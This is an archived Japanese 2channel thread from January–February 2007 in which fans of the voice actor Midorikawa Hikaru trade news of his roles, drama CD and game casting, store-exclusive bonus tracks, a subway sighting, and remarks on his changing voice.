241 :名無しさん@お腹いっぱい。:2007/01/25(木) 19:50:18 ID:Ktf6kBn60
彩雲国、普通に放送で見て見たいなぁ
見れるひとウラヤマシス

242 :名無しさん@お腹いっぱい。:2007/01/25(木) 20:02:47 ID:h3JGK4WU0
NHKで今やってる今日からマ王の再放送が終わったら
その枠で再放送すると思うけど。

243 :名無しさん@お腹いっぱい。:2007/01/26(金) 23:27:07 ID:hb1wQALp0
旅行記はいつまで続くのだろうか

244 :名無しさん@お腹いっぱい。:2007/01/27(土) 00:14:19 ID:XZ1yaAtZ0
地下鉄に乗ろうとしたら、目の前にミドリンが立ってた。
ビックリした(汗

245 :名無しさん@お腹いっぱい。:2007/01/27(土) 11:11:34 ID:hkOZa6Ri0
ウラヤマシス

246 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:31:25 ID:/WzunCJtO
久々に携帯声グラのフリーウェイが大量更新されてたので、読める人は是非。

有料だけど・・・。

247 :名無しさん@お腹いっぱい。:2007/01/28(日) 23:33:22 ID:/WzunCJtO
ごめんsage忘れ

248 :名無しさん@お腹いっぱい。:2007/01/30(火) 00:59:13 ID:BmB6DZ3T0
ガンガンWINGドラマCDシリーズ「ショショリカ」キャスト表

フィル:緑川光
シアニー:平井理子
キサン:杉山紀彰
ノイド:波多野和俊
カロ:高木渉
イノシン:岸尾大輔
ドコサ:柿原徹也
エイコ:釘宮理恵
カゼイン:杉田智和
リノール:小林紗苗
V.D:関俊彦
V.B2:井上和彦

4月発売

249 :名無しさん@お腹いっぱい。:2007/01/30(火) 09:39:53 ID:XQC83xb80
>>244
声かけた?

250 :名無しさん@お腹いっぱい。:2007/01/30(火) 20:48:58 ID:HjaAEbVa0
そういう場所では声かけないほうが良いんだよ


251 :名無しさん@お腹いっぱい。:2007/01/30(火) 20:54:10 ID:ov9MOO+D0
常識

252 :244です:2007/01/31(水) 00:57:32 ID:lRI5EXwW0
ラッシュ時を過ぎたとはいえ通勤電車の中ですので、声はかけませんでした。
ポクポン付の携帯いじってたし。
A BATHING APEの紫迷彩のダウンには乗り込む際に触ってしまいましたが(^^;
ホント思わぬところでの遭遇に、普通の顔をしているのが精一杯でした。

253 :名無しさん@お腹いっぱい。:2007/01/31(水) 01:24:10 ID:NOO9Swq80
恋姫†無双発売したが緑川さん演じる左慈は出番多いのか気になる・・
買った人います?

オンラインゲーム「鬼魂」平成19年2月8日配信開始 
【出演】傘をかぶった男:緒方賢一さん 山賊:石塚運昇さん
太和老子(女):井上喜久子さん 太和老子(男):緑川光さん

254 :名無しさん@お腹いっぱい。:2007/01/31(水) 09:57:08 ID:JlW9eNlW0
葉月ボイスファンにとっては
鬼のような店舗別特典・・・分けないで全部聞かせてくれよーって思う
ttp://www.konami.jp/gs/game/Girls_Side/tokuten/index.html#drama

255 :名無しさん@お腹いっぱい。:2007/01/31(水) 10:16:30 ID:4dYV1BeU0
うっわー
2のタイピングの特典にまで葉月かいな・・・。
何種類も買う人間はそうはいないから、結局オクの転売屋用の
商品になっちゃうだけなのに。

256 :名無しさん@お腹いっぱい。:2007/01/31(水) 10:24:16 ID:JpTs6yR40
別に葉月ファンだけじゃなく他のキャラファンも条件は同じだろ。
店鋪別特典も今どき珍しくないし。

257 :名無しさん@お腹いっぱい。:2007/01/31(水) 11:20:17 ID:uWaPg8U10
いや、ゲームの正規キャラならともかく、シリーズ前作キャラを特典にするのは
どう考えても客寄せパンd(ry
この人のキャラはそういうの多い気がする。テイルズのリオン筆頭に

258 :名無しさん@お腹いっぱい。:2007/01/31(水) 13:03:39 ID:4dYV1BeU0
今回の場合は1&2の両王子が双方に出張、という感じだから
リオン程のあざとさはないんだけどね。
でもテレカとかならともかく、聞いてみなけりゃ分からん
ドラマCDのぶつ切りはカンベンして〜〜

259 :名無しさん@お腹いっぱい。:2007/01/31(水) 23:46:28 ID:nCLBRBrEO
さっき検索してもこのスレもアンチスレも引っ掛からなかったから、落ちたのかと思ったよ

260 :名無しさん@お腹いっぱい。:2007/02/03(土) 17:57:43 ID:ysGYJAakO
2/3 フジテレビ系
後9:00〜11:24
マトリックス レボリューションズ


キッドの出番が多い方ですが、TV放送だからキャストチェンジになってるかな

261 :名無しさん@お腹いっぱい。:2007/02/03(土) 18:15:08 ID:7dZefptD0
>>260
キッド … クレイトン・ワトソン(石田彰)

262 :名無しさん@お腹いっぱい。:2007/02/03(土) 20:59:46 ID:AFy1K3O/0
>>261
むかつくT_T

263 :名無しさん@お腹いっぱい。:2007/02/04(日) 09:43:01 ID:bSggoUgV0
ttp://www.nicovideo.jp/watch?v=ut3FbkkeTBgjU

途中から流れる歌声がなんとなく似てる・・・

264 :名無しさん@お腹いっぱい。:2007/02/04(日) 12:16:47 ID:3quU7aD+0
>>263
似てないよ。。。。orz

265 :名無しさん@お腹いっぱい。:2007/02/06(火) 01:33:43 ID:cU1MTrnh0
ガンダム無双にヒイロが出るみたいだね。

266 :名無しさん@お腹いっぱい。:2007/02/06(火) 22:07:09 ID:PPHbdRhu0
ちょっと声が濁ってきてませんか?
ゲームもいいけど、もっと気を使ってほしい

せっかくの声が…

267 :名無しさん@お腹いっぱい。:2007/02/06(火) 23:29:07 ID:pKuTvPeg0
>266
たまたま聞いたキャラがそうだったんじゃ?
最近のもいろいろ聞いてるけど、そんなことないよ
相変わらず美声です

268 :267:2007/02/07(水) 00:12:46 ID:U58M/GMs0
ガンダム無双のムービーなんだけどね

昔より低くなったなと思ったから
たまたま調子悪かったのかも

269 :266:2007/02/07(水) 00:13:42 ID:U58M/GMs0
ごめん266だった
>267ってやるつもりが

270 :名無しさん@お腹いっぱい。:2007/02/07(水) 08:21:30 ID:f9RYznVc0
ヒイロに関しては諦めた方がいいよ。

過去何度も言われてるけど
昔の高い声のヒイロにはもう逢えないから…

271 :名無しさん@お腹いっぱい。:2007/02/07(水) 12:10:41 ID:nIExzkTU0
ヒイロはもう十年以上前のキャラだからね。
多少は仕方ないよ。
現在のキャラに目を向けよう。

期待してるのは彩雲国がさらに続いて冗官編とか迄やってほしい。
タンタン君への凶暴な台詞を緑川さんの声で是非聞かせてほしいよ。

272 :名無しさん@お腹いっぱい。:2007/02/07(水) 17:56:29 ID:PZvgOHisO
第二次αのヒイロは誰!?ってくらい変だったけど、続編の第三次αではマトモになってたけど

これは単に緑川さんが風邪かなんかで調子悪かっただけかな?

273 :名無しさん@お腹いっぱい。:2007/02/08(木) 02:41:21 ID:boZWPhjU0
しょっちゅう風邪ひいてんのかいw
普通に本人の声質が変わり始めてるのと、気を抜くと演じ方忘れちゃうからじゃね?

274 :名無しさん@お腹いっぱい。:2007/02/08(木) 03:02:04 ID:qXYVs38c0
今日のマサキはヒイロっぽかった。
まぁ元々明るいヒイロって感じだけど。
やっぱりロボットとかに乗ってグッと力を入れながら言うセリフかっちょええよ。

275 :名無しさん@お腹いっぱい。:2007/02/08(木) 07:58:23 ID:x14SBoCQ0
2/2発売『ジョジョの奇妙な冒険 ファントム ブラッド
究極総集編 OVER DRIVE』の巻頭カラーに
小西さん、小山さん、水樹さんと4人それぞれ二分の一頁の
インタビュー記事が新規写真つきで出てました。
ttp://ultra.shueisha.co.jp/00_HP2/hot_news/hot_main.htm
巻末予告ページにも、
2/9発売『OFFICIAL MOVIE GUIDE』の記事かと思われる
別写真があって、たぶんそっちの対談記事は、もう少し
ボリュームありそうな感じ。こっちの写真メガネがイイ

『集英社リミックス ジョジョの奇妙な冒険PART5 黄金の風2』
の方にも、映画版の特集が少しだけあって、
コメントが数行ありました
台本ボロボロになるほど読み込んだって
ディオ役入れ込んでたんでしょうね
今の声だからこそ回ってきた役って気がするから
声が変わってくるのも悪い事ばかりではないと思う

276 :名無しさん@お腹いっぱい。:2007/02/09(金) 13:25:07 ID:tJLpdyD80
彩雲国のラジオのツンデレキャラワロタw

277 :名無しさん@お腹いっぱい。:2007/02/10(土) 00:34:58 ID:Y/Mf//yS0
>>276
ツンデレ良かったね。ああいうキャラやってくんないかな。

って言うか、彩雲国とセイント以外に春の新番キャストに名前がなくて淋しい。
ゲームやCDは相変わらず出てるけど、やっぱスレタイ通りアニメもやってほしいな。

278 :名無しさん@お腹いっぱい。:2007/02/10(土) 00:35:40 ID:PR+aAWMP0
 

279 :名無しさん@お腹いっぱい。:2007/02/10(土) 02:08:53 ID:FStFbtzA0
>>276
>>277
あれはへたな萌えアニメのキャラより萌える。

280 :名無しさん@お腹いっぱい。:2007/02/10(土) 03:16:29 ID:NLg2LL/x0
緑川がツンするたびにいちいち関が爺さんになるのもワロタ

281 :名無しさん@お腹いっぱい。:2007/02/10(土) 15:57:05 ID:QPg9550+0
>>277
まんまリメTODのリオンだったじゃんw

68 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)